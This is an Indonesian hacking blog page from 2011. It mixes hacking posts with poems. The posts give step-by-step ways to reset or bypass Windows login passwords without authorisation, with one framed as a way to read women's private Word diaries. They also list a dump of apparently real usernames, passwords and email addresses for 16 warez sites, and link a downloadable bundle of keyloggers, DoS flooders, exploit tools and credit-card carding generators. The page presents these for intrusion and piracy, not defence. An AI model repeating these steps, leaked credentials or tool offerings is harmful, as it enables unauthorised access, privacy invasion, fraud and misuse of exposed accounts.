selamat datang

sehubungan dengan banyaknya permintaan tools dan ebook dalam bentuk cd,mohon mengganti biaya produksi dan kirimnya,sebab kami bukan milyuner yang kaya raya......................

Senin, 30 Mei 2011

Mengganti password administrator windows XP

Sistem keamanan windows XP memang sangat lemah. Hanya dengan teknik sederhana saja, anda bisa mengganti password administrator atau user yang sedang aktif tanpa harus mengetahui password lama. Saya coba di windows server 2003, ternyata berhasil juga. Untuk vista dan windows 7 belum saya cobakan karena memang saya tidak menggunakanya. Tips hacking berikut adalah teknik mengganti password administrator windows XP tanpa harus mengetahui password lama.


1. Langkah pertama buka command prompt atau ketik cmd di run kemudian enter.

2. Setelah command prompt terbuka ketik "net users" (tanpa tanda petik). Maka akan ditampilkan daftar semua user yang ada di komputer.



3. Ketik "net user namauser" (tanpa petik) untuk melihat detail user yang aktif. pada contoh di bawah saya akan melihat detail user pada komputer saya: net user salazarneo



4. Untuk mengganti password pada user salazarneo, ketik pada command prompt: "net user namauser *" (tanpa petik, pisahkan spasi untuk *). Misalnya net user salazarneo *

5. Ketik password baru kemudian enter, ulangi sekali lagi mengetik password baru lalu enter lagi. Maka password lama akan terganti dengan sangat mudahnya.

Selamat mencoba.

[+/-] terus diwoco bang...!!!!

SOFTWARE PEMBOBOL PASSWORD

Membobol, menjebol, membongkar, membuka password adalah aktifitas menyenangkan untuk menelanjangi privacy orang lain. Berbagai file telah dilengkapi password pelindung, misalnya microsoft office, PDF, Rar, Zip, administrator windows, SQL, exe, mozilla, dan lain-lain. Program/software/tools pembobol password pada umumnya berbayar. Jarang sekali yang diberikan gratis, kalaupun ada kemampuanya tidak mumpuni. Berikut ini saya berikan 10 program pembobol password dan yang menarik menurut saya, beserta beberapa password manajer lainya.

1. PDF Password


PDF Password dapat membongkar password yang melindungi file PDF. Program ini hanya mampu membongkar User permission password. PDF Password tidak dapat menerobos DRM (Digital Right Management) atau perlindungan copy digital pada PDF. Jika sebuah dokumen PDF tidak bisa dibuka karena dilindungi password, program ini dapat membongkarnya dengan mudah.

2. Windows Password Cracker


Windows Password Cracker dapat dengan mudah membobol password yang tidak terenkripsi dengan baik di sistem operasi windows. Windows password cracker dilengkapi dengan 53.000 kata berbahasa inggris sebagai ditctionary attack. Sebuah program sederhana namun cepat untuk membongkar password windows.

3. Atomic ZIP Password Cracker


Program ini digunakan untuk membongkar password file berformat ZIP. Atomic ZIP Password Cracker dapat dengam mudah menemukan password file ZIP dengan berbagai metode, yaitu Brute force atau penyerangan terus menerus atau dengan dictionary attack. Interface program ini juga mudah digunakan selain kecepatan pembongkaran password yang ditawarkan.

4. Nucleus Kernel SQL Password Recovery


Program ini digunakan untuk membuka password MDF (Master Data File) dari database SQL Server 2000. Nucleus Kernel SQL Password Recovery mampu mengembalikan semua password SQL yang tersimpan di sistem. File MDF sebenarnya diproteksi dengan algoritma password yang cukup kuat. Tidak mudah untuk mengenskripsi passwordnya kembali. Namun demikian, program ini mampu merekursif password dan secara otomatis menggeneratenya. Hasilnya dibuat sebuah password alternatif sebagai pengganti password aslinya. Keren bukan.

5. Password recovery for microsoft office


Seperti namanya, program ini mampu membongkar password dokumen microsoft office. Hampir seluruh jenis file microsoft office, baik Microsoft office word, excel, power point, access dan tentunya outlook. Dari percobaan yang saya lakukan, program ini mampu membuka kombinasi password 6 karakter dengan cepat.

6. Windows password unlocker


Windows password unlocker sepertinya adalah jagoan saya. Program ini adalah pelopor pembobol login administrator windows dengan tampilan grafis. Tidak seperti program lain yang umumnya berbasis text, Windows password unlocker mampu membobol password login windows 2000/2003/NT/XP/Vista dan tentunya windows 7. Tidak perlu melakukan instalasi ulang sistem operasi anda, cukup gunakan program ini yang dibooting dari CD, kemudian ikuti langkah-langkah mudahnya.

7. RAR Password Recovery


RAR Password recovery mampu diandalkan sebagai pembongkar password file berformat RAR. Dilengkapi dengan tiga teknik pembobol password umum seperti Brute force, boost up dan dictionary attack. RAR Password Recovery juga dilengkapi resume progress yang dapat mengulang proses pembobolan password di lain waktu.

8. MessenPass


MessenPass seperti namanya digunakan untuk mengobok-obok password messenger client seperti Yahoo Messenger, MSN Messenger, Trilian, Miranda, Google Talk, dll. MessenPass hanya mampu membobol password messenger yang disetting "remember password", selain itu program ini hanya berjalan di komputer lokal. Artinya untuk membobol password messenger seseorang, anda harus secara fisik menguasai komputer lawan.

9. Asterik Logger


Asterik Logger digunakan untuk mendapatkan password yang tersembunyi di balik asterik (bintang). Beberapa program seperti FTP Clinet, dan Mail Client biasanya menampilkan ******* pada kotak password. Dengan program ini anda dapat menampilkan password dibalik bintang tersebut.

10. PasswordFox


Dari namanya mungkin anda telah bisa menebaknya. Benar sekali Password Fox digunakan untuk memunculkan password yang tersimpan di dalam browser mozilla firefox. Kebiasaan seseorang yang menyimpan password di cache memory web browser dapat dimanfaatkan untuk diintip passwordnya menggunakan Password Fox.

DOWNLOAD SOFTWARE PEMBOBOL PASSWORD

[+/-] terus diwoco bang...!!!!

ziddu hacked

Ziddu sebagai file hosting / file sharing di internet memiliki popularitasnya tersendiri. Pengguna ziddu memilih menyimpan filenya disana karena ada fasilitas Pay Per Download (PPD). Walaupun nilai earning yang diberikan tidak begitu besar, yaitu $1 per 1000 download file yang dilakukan atau $0,1 setiap pengguna baru yang terdaftar melalui link refferal di bawah kita. Berikut beberapa tips hacking ziddu yang dapat kamu cobakan untuk memaksimalkan hasil pencarian:

1. Menghilangkan iklan pop-up ziddu

Setiap kali memasukan code captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) atau melakukan klik tombol Downloads, ziddu akan menampilkan pop- up iklan hampir satu halaman penuh. Cukup mengganggu menurut saya. Untuk menghilangkanya, lakukan sedikit pengaturan browser yang anda gunakan (saya asumsikan anda menggunakan Mozilla).

Klik Tools - Content. Hilangkan tanda centang Enable JavaScript dan Enable Java. Coba lakukan download kembali, saya jamin pop-up iklan tidak akan ditampilkan kembali.



2. Teknik mencari file di Ziddu

Tidak seperti 4shared, rapidshare atau megaupload yang menyediakan fasilitas atau tools pencarian file. Ziddu tidak memiliki fasilitas search file sehingga tidak memungkinkan untuk mencari file yang tersedia di database ziddu.

Namun tidak perlu kuatir, Mesin pencari menyediakan fasilitas pencarian ini dengan sangat mudah. Caranya buka halaman mesin pencari anda (google). Gunakan kata kunci "site:ziddu.com nama_file" (tanpa tanda petik). Misalnya anda mencari script affiliate populer SMUO, maka ketik site:ziddu.com smuo

Bold

3. Melihat seluruh link download ziddu

Hacking ziddu ketiga ini yang tidak kalah menarik. Saya temukan saat tidak sengaja mencari file dengan teknik hacking ziddu no.2 di atas. Saya menemukan link berbeda dari link download ziddu biasanya. Kira-kira seperti ini http://www.ziddu.com/root/urllist17.txt

Coba anda copy-pastekan link tersebut di browser kemudian lihat hasilnya. Apa yang terjadi? ternyata akan ditampilkan ribuan link download ziddu. Baru saya sadari ternyata daftar link download ziddu terletak di dalam folder root dengan format nama urllistxx.txt. XX adalah daftar file database yang ada, tersedia dari 01 - 150 untuk saat ini.



Jadi kalau anda berminat memiliki database link download ziddu, coba download saja koleksi file database tersebut menggunakan software download misalnya Internet Download Manajer. Anda bisa memiliki library link download ziddu semuanya. He..he

Selamat Mencoba

[+/-] terus diwoco bang...!!!!

Hack password windows login

Dalam hal ini kita membutuhkan sebuah software PNH boot yang dapat di download di situs resminya di http://home.eunet.no/~pnordahl/ntpasswd/.

Kamu bisa memilih versi rilis yang terbaru, namun penulis memilih yang versi 18 Agustus 2004 (040818). Kemudian bakar file iso yang telah di download tadi yang besarnya tidak sampai 2 MB ke dalam sebuah CD atau FD kemudian ikuti langkah-langkah berikut ini.

1.

Masukan CD bootable PNH yang telah kita buat sebelumnya.Restar komputer dan masuk ke BIOS. Atur agar booting pertama dibaca dari CD. Kemudian Save.
2.

Tunggu sejenak, layar akan dipenuhi tulisan-tulisan yang pada prinsipnya sama seperti proses booting pada linux.
3.

Tulisan akan berhenti pada langkah pertama; Step One : Select disk where the windows instalation. Disini akan ditampilkan seluruh partisi harddisk yang ada. Pilih partisi dimana windows terpasang. Biasanya windows berada pada urutan pertama (1), untuk itu ketik “1” (tanpa kutip) kemudian enter.
4. Kemudian selanjutnya ditampilkan langkah kedua; Step two: Select path and registry files. Pada pilihan ini kita di suruh memilih lokasi direktori registry. Secara default berada pada Windows/system32/config. Tekan saja Enter.
5. Kemudian akan bermunculan pesan-pesan dan berhenti sampai tampilan seperti ini. Pilih “1” untuk mereset password kemudian enter.
6.

Kemudian proses akan dilakukan. Tunggu hingga masuk ke langkah ke tiga; Step Three: Password or registry edit. Untuk proses ini ketik angka “1” untuk mengedit data user dan password kemudian enter.
7. Kemudian akan muncul account windows XP dan juga administrator. Kemudian ketik nama account mana yang passwordnya hendak kita reset. Sebagai contoh nama account yang di reset adalah “Andi”, maka ketik nama tersebut kemudian enter.
8. Selanjutnya kita dituntut memasukan password yang baru. Ketik “*” untuk blank password (tanpa password) terus tekan enter. Selanjutnya ketik “y” dilanjutkan enter untuk melanjutkan proses. Kemudian keluar dengan mengetik ”!” kemudian enter.
9. Kemudian masuk ke langkah ke empat; Step Four: Writing back changes. Jika kita ingin benar-benar melanjutkan tekan “y” jika tidak tekan “n”. Untuk ini tentu saja kita tekan y kemudian enter.
10. Setelah selesai proses akan menampilkan Edit Complete. Sampai sini proses telah selesai. Kemudian tekan ”y” untuk melanjutkan.
11. Proses akan dilanjutkan, kemudian akan ditampilkan kembali langkah tiga yang telah kita lalui. Untuk keluar dan kembali ke jendela login tekan Alt + Ctrl + Del. Maka komputer akan merestart ulang. Jangan lupa keluarkan CD boot PNH dari CD room.
12. Akhirnya kita bisa melihat user login yang tadinya terpassword telah terbuka dan kita bisa masuk dengan tanpa password tentunya. Selamat mencoba...!

[+/-] terus diwoco bang...!!!!

Hack dokumen MS Word yang terpassword

Sebelumnya aku mau ngucapin maaf yang sebesarnya kepada cewek2 yang hobi nulis diary dan curahan hatinya pada dokumen MS Word yang dipassword. Dan tentunya kuucapin selamat kepada cowok2 yang hobi mencuri dan membaca rahasia pribadi cewek2..hi..hi.

Artinya tak ada yang aman di dunia ini sobat, apapun bisa dilakukan..heah.

Kali ini aku mo berbagi ide ngobrak-abrik dokument MS Word yang telah dipasangi password. Untuk masalah ini aku menggunakan sebuah tool pembuka password yang cukup populer yaitu Passware yang sumber aslinya diunduh dari http://lostpassword.com. Yang tentunya sudah dimodifikasi (was crack) oleh orang2 yang hobi kebebasan tentunya…wew, tanya kenapa..?

Wah ngoceh melulu, langsung aja deh. Yups, pertama download toolnya disini. Setelah itu di unpack dan install seperti biasa (jangan lupa memasukan serial number yang ada di cracks.txt).

Jalankan program, ambil dari start menu – Passware – Office Key. Tampilanya kira-kira seperti di bawah ini.

Sebelum menjalankan, lakukan penyetingan dulu yach. Maksudnya sih biar efektif dipakai (ini cuma pengalaman penulis..hi..hi). Klik menu Settings, pada bagian General pilih Bruce forceAttack types (pilihan yang lain tanda contengnya dihilangkan) kemudian OK.

pada pilihan

Selanjutnya klik Recover untuk mencari dan membuka file MS Word terpassword yang ingin di bongkar passwordnya. Tunggu sesaat program akan mengolah dokumen hingga keluar passwordnya (sebaiknya program2 lain yang sedang terbuka ditutup dulu, coz program ini membutuhkan resource memory yang besar). Lamanya membongkar password tergantung dari panjangnya password yang dipasang. Untuk password 4 digit bisa kurang dari 30 detik, untuk 5-6 digit bisa mencapai 2-10 menitan. Untuk password yang lebih panjang lagi bisa ditunggu sambil tidur aja..he..he.
Salah satu hasilnya bisa dilihat pada gambar di bawah ini. Pada contoh kali ini password hanya terdiri dari 6 dan 5 digit. Estimasi waktu yang dibutuhkan hanya sekitar 5 menitan...cepat ya!, yach begitulah.


Sekali lagi penulis tegaskan bahwa jangan merasa aman dahulu terhadap suatu hal, semua bisa saja terjadi. Dan yang pasti ilmu yang baik harus diterapkan untuk hal yang baik pula. Selamat mencob

[+/-] terus diwoco bang...!!!!

THE HACKER'S UNDERGROUND HANDBOOK


Ingin belajar menjadi hacker tapi tidak tahu memulai dari mana? Buku ini adalah salah satu jawabanya. The Hacker's Underground Handbook mengulas berbagai teknik hacking yang populer digunakan. Dari teknik hacking sederhana sampai pada teknik intermediate dan advanced. Disusun oleh David Melnichuk, pendiri blog yang membahas hacking dan keamanan. Anda dapat mengunjungi blognya di http://mrcracker.com.


Daftar isi buku The Hacker's Underground Handbook :

Pendahuluan
- Apa itu Hacker?
- Hacker dan penggolonganya
- Mengapa menjadi seorang Hacker

Pemrograman
- Perlukah mempelajarinya?
- Dimana saya harus memulai?
- Cara belajar terbaik

Password
- Password Cracking
- Phising
- Program-program pencuri password

Network Hacking
- Foot Printing
- Port Scanning
- Banner Grabbing
- Searching the Vulnerabilities
- Penetrating

Wirelless Hacking
- Scanning wireless network
- Cracking WEP
- Packet Sniffing

Windows Hacking
- NetBios
- Cracking windows password

Malware
- Definisi
- Prorat

Web Hacking
- Cross site scripting
- Remote file inclusion
- Local file inclusion

DOWNLOAD

[+/-] terus diwoco bang...!!!!

x code megazine


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

[+/-] terus diwoco bang...!!!!

Account premium situs download gratis

Download software, games, movie, templates sepuasnya adalah dambaan setiap pengguna internet. Secara teknis sebenarnya dapat dicari menggunakan Google atau mengunjungi situs-situs warez, DDL atau Nulled, namun terkadang tidak lengkap. Beberapa situs menyediakan fasilitas download cepat seperti Usenext, tapi kita harus mengeluarkan sedikit dollar untuk menebus username dan account premiumnya. Berikut 16 situs download beserta account premiumnya. Gunakan dengan bijak ya!


1). www.divxcrawler.com
Username : divx273
Password : 8342729

2). www.butterflydownloadnetwork.com
Username : cinemanetwork20
Password : butterfly20

3). www.downloadprofessional.com
Username : lo886Ees
Password : zAgt88er

4). www.sharingzone.net
Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD

5). www.unlimitedgamedownloads.com
Username : ga20me
Password : ke01feb

6). www.watchdirect.tv
Username : cinemanetwork20
Password : butterfly20

7). www.fullreleasez.com
Username : Af872HskL
Password : XjsdH28N

8). www.fulldownloads.us
Username : Af872HskL
Password : XjsdH28N

9). www.pirateaccess.com
Username : yourfrienddalat@gmail.com
Password : CHh5LKPI

Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY

Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt

Username : mubashar_siddique@yahoo.com
Password : F9Gzgwb5

10). www.warezquality.com
Username : ageg2020
Password : z8fsDfg3

11). wwww.warezreleases.com
Username : HnRPxKQz
Password : a59KBV7

Username : a25bipZP
Password : 1TeVnoJb

Username : SHYyJfWU
Password : P4K20uO

12). www.fulldownloadaccess.com
Username : mpuv3y
Password : umvpy3x

13). www.alphaload.com
Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS

14) www.gamedownloadnow.com
Username : ga20me
Password : ke01feb

15). www.unlimiteddownloadcenter.com
Username : cu20me
Password : ke01feb

16). www.tvadvanced.com
Username : mv03dl
Password : frmvdl

[+/-] terus diwoco bang...!!!!

ebook hacking


Ebook hacking adalah sarana belajar yang cukup baik bagi seorang hacker pemula (newbie). Setidaknya teknik-teknik dasar yang dijelaskan di dalamnya menjadi pondasi kokoh untuk beranjak ke tingkat lebih tinggi. Tidak perlu bingung mencari ebook hacking yang mengulas berbagai teknik hacking dasar. Para sesepuh hacker dengan senang hati membundlenya dalam satu paket siap download. Namanya Hacking E-book AIO.



Hacking E-book AIO berisi kumpulan ebook hacking populer. Dari dasar-dasar hacking, hacking administrator, hacking web, hacking game console, sampai hacking wireless. Anda tidak perlu lagi mencari kesana-sini ebook hacking. Tinggal download semua sudah tersedia.


Berikut koleksi ebook hacking yang ada di dalamnya:

Hacking for Dummies
Hacking Intranet Websites
Hacking Techniques
Hacking The Cable Modem
Hacking The Linux
Hacking Web Applications
Hacking Windows XP
Hacking PSP
The Art of Deception
The Art of Intrusion
Network Security Hacks
Paypal Hacks
PC Hacks
Simple Hacks
The Database Hacker Handbook
Wireless Hacking
Wireless Hacks
Bluetooth Hacking
Ethical Hacking
Google Hacks
Hack & Crack
Hack Attacks Testing
Hack IT
Hack Proofing Your Network 1st
Hack Proofing Your Network 2nd
Hack Proofing Your Web Server
Hack The Net
Hack Xbox 360
Hackers Black Book
Hacking Firewalls And Networks
Hacking a Coke Machine
Hacking and Network Defense
Wireless Network Hacks & Mods

DOWNLOAD Hacking E-book AIO
LINK 1 (Rapidshare)
LINK 2 (Hotfile)
Link 3 (Uploding)

[+/-] terus diwoco bang...!!!!

CD Tutorial Linux Hacking Backtrack 4 Free


Oleh-oleh hacking tahun 2010 adalah Video Tutorial Hacking dengan Linux Backtrack 4. Video tutorial ini dapat anda download secara cuma-cuma. Memiliki size yang cukup membuat bandwith anda kembang-kempis, lumayan besar yakni 6.32 GB. Bagi anda yang memiliki bandwith lumayan cepat ketika mendownloadnya bisa di tinggal untuk pergi membeli cemilan, ke warteg, atau bisa di tinggal tidur siang, ataupun sambil mengopi. Namun bagi anda yang memiliki bandwith yang sempit, proses downloadnya bisa anda tinggal pergi liburan selama 1 bulan atau lebih. :D. Apa yang di bahas dalam Video Tutorial Hacking ini ??
Episode 1 – Network Hacking – Arp Poisoning
Episode 2 – Wireless Hacking – Cracking WEP
Episode 3 – Wireless Hacking – DeAuth
Episode 5 – Lock Picking – Bump Key
Episode 6 – Phone Phreaking – Beige Box
Episode 7 – Phone Phreaking/Network Hacking – Sniffing VOIP
Episode 8 – Lock Picking – DIY Padlock Shims
Episode 9 – Lock Picking – Mult-Disc Combo Locks
Episode 10 – Hacking Basics – MD5
Episode 11 – Website Hacking – Sql Injection
Episode 12 – Hacking Basics – Backtrack
Episode 13 – Website Hacking – XSS
Episode 14 – Staying Secure – SSH Tunnel
Episode 15 – Modding – Xbox Softmod
Episode 16 – Wireless Hacking – Cracking WPA
Episode 17 – Triple Boot – Windows, Backtrack, & Ubuntu
Episode 18 – Local Password Cracking
Episode 19 – Lock Picking Basics
Episode 20 – Ettercap
Episode 21 – XSS Tunnel
Episode 22 – Playstation 2 Softmod
Episode 23 – Cracking WEP Update
Episode 24 – Bypass Hotspot’s Access Controls
Underground – Install Backtrack 3 on USB
Underground – CSRF(Cross Site Request Forgery)
Underground – Alternate Data Streams
Underground – Local File Inclusion
Underground – Windows Privilege Escalation
Underground – Bluetooth Hacking
Underground – VMWare
Underground – Fix Google Mail Enumerator
Underground – Home Made Lock Picks
Underground – Downfalls of Anti-Virus Software Part 2
Underground – Downfalls of Anti-Virus Software
Underground – Evilgrade
Underground – Trojan Basics
Underground – Manipulating Windows User Accounts
Underground – Combine Files
Underground – Password Phishing
Underground – Windows SMB Relay Exploit
Underground – Application Patching
Underground – Metasploit Autopwn
Underground – Email Spoofing
Underground – Introduction
Extracting Database Information from Information_Schema
FPGA MD5 Cracker
Arduino ARP Cop
Email Injection
Ping of Death
DNS Spoofing with Virtual Hosts
Bypass Cisco Clean Access & Cisco NAC Appliance
Dual Boot – Windows & Backtrack
Sql Injection Challenge How-to
How to use Intel Pro/Wireless 3945ABG in Backtrack 2
Local Privilege Escalation Vulnerability in Cisco VPN Client

Silahkan download di sini …

http://hotfile.com/dl/25115438/d19f10f/bt.DVD.part01.rar.html

http://hotfile.com/dl/25115968/18fa8e5/bt.DVD.part02.rar.html

http://hotfile.com/dl/25116314/b963c46/bt.DVD.part03.rar.html

http://hotfile.com/dl/25116591/fab11bb/bt.DVD.part04.rar.html

http://hotfile.com/dl/25116915/2882182/bt.DVD.part05.rar.html

http://hotfile.com/dl/25117144/6f25cef/bt.DVD.part06.rar.html

http://hotfile.com/dl/25117442/205cd46/bt.DVD.part07.rar.html

http://hotfile.com/dl/25117654/12cb72b/bt.DVD.part08.rar.html

http://hotfile.com/dl/25117920/2b12f8b/bt.DVD.part09.rar.html

http://hotfile.com/dl/25118192/276ee91/bt.DVD.part10.rar.html

http://hotfile.com/dl/25118474/0a1c516/bt.DVD.part11.rar.html

http://hotfile.com/dl/25118886/dac42cc/bt.DVD.part12.rar.html

http://hotfile.com/dl/25119320/9a494df/bt.DVD.part13.rar.html

http://hotfile.com/dl/25124466/f426200/bt.DVD.part14.rar.html

http://hotfile.com/dl/25125403/c4bd091/bt.DVD.part15.rar.html

http://hotfile.com/dl/25126157/7c34a43/bt.DVD.part16.rar.html

http://hotfile.com/dl/25126892/6b2b305/bt.DVD.part17.rar.html

http://hotfile.com/dl/25127791/d516701/bt.DVD.part18.rar.html

http://hotfile.com/dl/25128566/e155665/bt.DVD.part19.rar.html

http://hotfile.com/dl/25129145/24ea2b2/bt.DVD.part20.rar.html

http://hotfile.com/dl/25129668/ce706b8/bt.DVD.part21.rar.html

http://hotfile.com/dl/25130322/08fa8bb/bt.DVD.part22.rar.html

http://hotfile.com/dl/25130962/8c4d9a7/bt.DVD.part23.rar.html

http://hotfile.com/dl/25131616/28a9ef2/bt.DVD.part24.rar.html

http://hotfile.com/dl/25132156/c3fb6cc/bt.DVD.part25.rar.html

http://hotfile.com/dl/25132903/d6d8232/bt.DVD.part26.rar.html

http://hotfile.com/dl/25133491/8dd5f2c/bt.DVD.part27.rar.html

http://hotfile.com/dl/25134062/365b929/bt.DVD.part28.rar.html

http://hotfile.com/dl/25134551/d52aa9a/bt.DVD.part29.rar.html

http://hotfile.com/dl/25135308/3aa5284/bt.DVD.part30.rar.html

http://hotfile.com/dl/25135898/135bc05/bt.DVD.part31.rar.html

http://hotfile.com/dl/25136466/9f68bbc/bt.DVD.part32.rar.html

http://hotfile.com/dl/25136722/1492995/bt.DVD.part33.rar.html

[+/-] terus diwoco bang...!!!!

Ebook Ninja Hacking: Unconventional Technique


Terkadang pernyataan-pernyataan konyol yang sering dibicarakan oleh para praktisi sistem keamanan ada benarnya juga, kalimat-kalimat seperti “untuk menangkap maling… ya kita harus jadi maling juga, atau setidaknya memiliki kemampuan yang jauh ke depan melebihi maling.”

Mungkin logika-logika seperti ini bisa saja ditanamkan kepada para calon-calon praktisi sistem keamanan nantinya, namun bukan berarti para calon-calon praktisi sistem keamanan atau IT Security ini di didik untuk menjadi penjahat-penjahat yang merugikan luar biasa.

Pada intinya bagaimana bisa seorang admin / kuncen server / teknisi jaringan atau entah apa namanya bisa menjaga dengan maksimal data-data penting perusahaan jika mereka tidak mengetahui dan tidak memiliki cara berpikir seorang intruder/cracker/penyusup/maling atau entah apa namanya? Pastinya seseorang tersebut membutuhkan satu panduan yang luar biasa menangani permasalahan ini. Menangani permasalahan “Bagaimana mengamankan jaringan data dari tangan-tangan jahil”, caranya adalah “Memiliki pola dan cara berpikir seorang maling”.

Ebook Ninja Hacking: Unconventional Penetration Testing Tactics and Techniques sepertinya tepat menjadi pelengkap pemandu seorang admin memiliki pola dan cara berpikir seperti seorang maling.

Ebook Ninja Hacking mendiskusikan secara terperinci bagaimana teknik yang digunakan oleh penyerang dalam kondisi yang nyata. Ebook ini pun membahas bagaimana memiliki pikiran seorang ninja atau maling tepatnya, sehingga dengan mudah dapat melakukan penetration testing. Selain teknik-teknik hacking, ebook ini pun membahas bagaimana melakukan physical attack. Sesuai dengan judulnya ebook ini membahas cara-cara yang tidak konvensional, tapi berdasarkan pada kondisi yang benar-benar nyata.

Silahkan download ebooknya di sini

[+/-] terus diwoco bang...!!!!

CD Hacking Tools


Danger Cracking & Hacking Tools – Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks,moods,mugins,weemees and meegos + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 1.1
11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

1. Elgolf 1.0 Beta
2. ESK KeyLogger
3. Glog Keylogger
4. HermanAgent
5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

1. Cmaster
2. CC Verify
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. id-fake
12. Paypal-Link-Spoofed
13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS

1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. Web Attacker ENG
5. TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v1.001b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
14. phpBB Attacker
15. Ping Attack
16. Site Nuke
17. Divine Intervention
18. UC Forum Spammer
19. Inferno Nuker
20. Multiple Site Flood

Silahkan di download di :
bagian 1
bagian 2

Pass : XxxPass_DJ_haselking
Pass :-XxxPass_DJ_haselking

[+/-] terus diwoco bang...!!!!

Minggu, 22 Mei 2011

Puisi suami minta poligami

Istriku,
Jika engkau bumi, akulah matahari
Aku menyinari kamu
Kamu mengharapkan aku
Ingatlah bahtera yg kita kayuh, begitu penuh riak gelombang
Aku tetap menyinari bumi, hingga kadang bumi pun silau
Lantas aku ingat satu hal
Bahwa Tuhan mencipta bukan hanya bumi, ada planet lain yg juga mengharap aku sinari
Jadi..
Relakanlah aku menyinari planet lain, menebar sinarku
Menyampaikan faedah adanya aku, karna sudah kodrati
dan Tuhan pun tak marah...






Balasan istrinya......


Suamiku,
Bila kau memang mentari, sang surya penebar cahaya
Aku rela kau berikan sinarmu kepada segala planet yg pernah TUHAN
ciptakan karna mereka juga seperti aku butuh penyinaran dan akupun juga
Tak akan merasa kurang dengan pencahayaanmu
AKAN TETAPIIIIIIII..
Bila kau hanya sejengkal lilin yg berkekuatan 5 watt, jangan bermimpi menyinari planet lain!!!
Karena kamar kita yg kecil pun belum sanggup kau terangi
Bercerminlah pd kaca di sudut kamar kita, di tengah remang-remang
Pencahayaanmu yg telah aku mengerti utk tetap menguak mata
Coba liat siapa dirimu... MENTARI atau lilin ? PLIS DEH...!!!

[+/-] terus diwoco bang...!!!!

Ku terkoyak, siksa merindumu

aku terkoyak, terkulai.
siksa candu merindu;sendu
jiwa seperti terkuliti perihnya berasa

padahal…
hati telah kusam
lama tak terjamah,
bahkan kukira sudah mati

bagaimana kubisa memaksa melupa
sebab rasa kutekan, semakin kuat justru menjerat

inilah siksa dalam nikmat

[+/-] terus diwoco bang...!!!!

karyawan

Akulah karyawan paling rajin di dunia,
Berani berkorban nggak nonton Piala Dunia,
Meski hati merana tapi tetap berdedikasi ,
Meski hari sabtu gini aku tetap berdasi ,

Akulah karyawan paling pantes dapet promosi,
Selalu paling depan ngisi daftar absensi ,
Di antara rekan akulah yang paling rajin ,
Temen yang nggak masuk pun aku absenin

Jam 8 kurang udah masuk kantor ,
Tidak lupa membeli koran,
Di koran banyak berita koruptor ,
Kenapa gua nggak kebagian ?

Sekarang hidup bener-bener nggak aman ,
Pake handphone di mobil digedor kapak merah ,
Itulah kenapa aku nggak beli mobil dan handphone ,

Tahun pertama ngantor masih tinggal di kost,
Tahun ketujuh ngantor udah pindah tempat kost,
Tahun pertama pergi-pulang nebeng tukang pos,
Di saat krismon pergi-pulang nebeng boss,

Akulah karyawan yang paling setia,
Sedari peletakan batu pertama kantor, aku jadi kulinya,
Sampai kantor punya jaringan komputer, aku jadi net-admin-nya,
Sampai kantor diledakin , aku jadi otaknya... !!

[+/-] terus diwoco bang...!!!!

puisi cinta ala matematika

saat aku bersua dengan eksponen jiwamu,
sinus kosinus hatiku bergetar
Membelah rasa

Diagonal-diagonal ruang hatimu
bersentuhan dengan diagonal-diagonal bidang hatiku

Jika aku adalah akar-akar persamaan
x1 dan x2
maka engkaulah persamaan dengan akar-akar
2x1 dan 2x2

Aku ini binatang jalang
Dari himpunan yang kosong
Kaulah integrasi belahan jiwaku
Kaulah kodomain dari fungsi hatiku

Kemana harus kucari modulus vektor hatimu?
Dengan besaran apakah harus kunyatakan cintaku?

kulihat variabel dimatamu
Matamu bagaikan 2 elipsoid
hidungmu bagaikan asimptot-asimptot hiperbola
kulihat grafik cosinus dimulutmu

modus ponen.... podue tollens....
entah dengan modus apa kusingkap
logika hatimu.....
Beribu-ribu matriks ordo 2x2 kutempuh
Bagaimana kuungkap adjoinku padamu

kujalani tiap barisan geometri yang tak hingga jumlahnya
tiap barisan aritmatika yang tak terhitung...

Akhirnya kutemui determinan matriks hatimu
Tepat saat jarum panjang dan pendek
berimpit pada pukul 10.54 6/11

[+/-] terus diwoco bang...!!!!

Puisi cinta ala Matematika dan Fisika

Archimedes dan Newton tak akan mengerti
Medan magnet yang berinduksi di antara kita
Einstein dan Edison tak sanggup merumuskan E=mc2
Ah tak sebanding dengan momen cintaku...

Pertama kali bayangmu jatuh tepat di fokus hatiku
Nyata, tegak, diperbesar dengan kekuatan lensa maksimum
Bagai tetes minyak milikan jatuh di ruang hampa
Cintaku lebih besar dari bilangan avogadro...

Walau jarak kita bagai matahari dan Pluto
saat aphelium
